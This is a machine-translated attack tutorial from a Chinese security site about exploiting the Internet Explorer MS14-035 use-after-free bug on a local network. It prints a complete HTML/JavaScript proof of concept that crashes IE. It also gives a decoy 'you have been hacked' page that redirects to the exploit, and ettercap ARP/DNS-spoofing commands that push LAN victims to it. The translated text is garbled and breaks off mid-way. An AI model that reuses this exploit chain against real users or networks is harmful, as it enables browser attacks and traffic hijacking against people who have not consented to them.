The use of“MS14-0 3 5”,the IE browser for malicious attacks-vulnerability warning-the black bar safety net

2014-09-27T00:00:00
ID MYHACK58:62201454110
Type myhack58
Reporter 佚名
Modified 2014-09-27T00:00:00

Description

  • This vulnerability could cause Internet Explorer to crash, to version have ie8,9,1 0, Microsoft in 1 4 year 6 month 1 0 day release the Update Patch,

So now the only attack there is no update this year 6 month 1 0 Number of IE browser. Details see here:

http://www.exploit-db.com/exploits/33860/

As described above, the use of this vulnerability, we need a piece of html code. The following I in the present machine the demo under the LAN attack it, drone

Is installed in a virtual machine in win7_sp1-ie9: the

First modify the /var/www directory index.html for the following:

<html>

<head>

<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">

<title>YOU HAVE BEEN HACKED</title>

</head>

<body>

you have been hacked,and you will shutdown!!

</body>

</html>

This is the attack the target first open the page, the page first displays the “you have been hacked,and you will shutdown!!”, the

A forced first; then set the refresh time to 5 seconds"refresh"content=5):automatically after 5 seconds to open the back of which is the containing Li

With the ie vulnerability html page, which is here http://192.168.1.29/poc.html in the same directory of the new poc.html content for

(You can also directly index. html modified to the following content): the

<html>

<head><title>MS14-0 3 5 Internet Explorer CInput Use-after-free POC</title></head>

<body>

<form id="testfm">

<textarea id="child" value="a1" ></textarea>

<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>

<textarea id="child3" value="a2" ></textarea>

<input type="text" name="test1">

</form>

<script>

var startfl=false;

function changer() {

// Call of changer function will happen inside mshtml! CFormElement::DoReset call, after

//execution of this function crash in DoReset will happen when accessing freed CInput element

if (startfl) {

document. getElementById("testfm"). innerHTML = ""; // Destroy form contents, free next

CInput in DoReset

CollectGarbage();

}

}

document. getElementById("child2"). checked = true;

document. getElementById("child2"). onpropertychange=changer;

startfl = true;

document. getElementById("testfm"). reset(); // DoReset call

</script>

</body>

</html>

Then open apache2, then use ettercap for dns spoofing: the

service apache2 start

ettercap-TqP dns_spoof-M arp:remote/192.168.1.27/ //

See the following effects:

!